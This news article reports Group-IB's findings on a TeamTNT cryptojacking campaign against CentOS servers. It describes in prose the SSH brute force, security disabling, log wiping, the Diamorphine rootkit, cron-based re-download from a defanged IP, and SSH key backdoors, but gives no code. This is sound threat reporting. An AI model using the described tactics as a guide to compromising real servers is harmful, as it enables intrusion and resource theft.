NEWS: New Cryptojacking Campaign Targeting CentOS Servers

September 30, 2024

The notorious cryptojacking group known as TeamTNT has likely re-emerged, launching a new attack campaign aimed at Virtual Private Server (VPS) infrastructures that use CentOS as their operating system.

According to Group-IB researchers, the attackers gained initial access through a brute-force attack on Secure Shell (SSH) credentials associated with the victim’s infrastructure. Once access was obtained, they deployed a malicious script designed to further compromise the system.

The cybersecurity firm from Singapore explained that the script carries out several tasks, such as disabling security mechanisms, deleting logs, halting cryptocurrency mining activities from competing malware, and impeding any potential recovery measures.

The attack process culminates in the installation of the Diamorphine rootkit, which is used to obscure the malicious operations from detection, while simultaneously enabling continued remote access to the compromised system.

This latest wave of activity has been attributed to TeamTNT with a moderate level of certainty, due to the observed similarities in the attack methods and operational techniques used by the group in previous incidents.

A History of TeamTNT

TeamTNT was initially identified in 2019, gaining notoriety for its involvement in unauthorized cryptocurrency mining, primarily targeting cloud and container environments. Despite announcing an end to their operations in November 2021 with a “clean quit,” multiple campaigns linked to the group have been reported since September 2022, indicating that the threat actor remains active.

The Malicious Script’s Modus Operandi

The hallmark of this new campaign is a shell script that begins by checking if the compromised system had already been infected by other cryptojacking malware. Once confirmed, the script proceeds to undermine the device’s security by disabling key protection features such as SELinux, AppArmor, and the system’s firewall.

“The script specifically looks for a daemon linked to Alibaba’s cloud service, identified as aliyun.service,” researchers explained. “If this daemon is found, the script fetches and runs a bash script from update.aegis.aliyun.com to remove the service.”

In addition to eliminating any competing cryptocurrency mining processes, the script executes a set of commands to eliminate traces of previous cryptojacking activities. This includes terminating any containerized processes linked to mining and removing images tied to illicit coin mining operations.

Persistence and Concealment Tactics

The campaign also ensures long-term control of the compromised systems by creating persistence mechanisms. These include configuring cron jobs that repeatedly download and execute the malicious shell script every 30 minutes from a remote server (65.108.48[.]150). The script also modifies the “/root/.ssh/authorized_keys” file, adding a backdoor account to maintain access.

“The attacker further solidifies their control by modifying file attributes, setting up a backdoor user with root privileges, and deleting the command history to conceal their tracks,” the researchers highlighted. “They take extra precautions by making changes to both the SSH and firewall configurations.”

This sophisticated set of tactics illustrates the threat actor’s thoroughness in leaving no trace of their activities, while also maintaining full control over the compromised systems.

Conclusion

The resurgence of TeamTNT poses a significant threat to cloud infrastructures and VPS environments, particularly those running CentOS. The use of brute force to gain SSH access, followed by the deployment of rootkits and other malicious tactics, makes the group a formidable adversary. This new campaign demonstrates the ongoing risk posed by cryptojacking groups, who continue to evolve their techniques to exploit cloud and container-based systems for unauthorized cryptocurrency mining activities.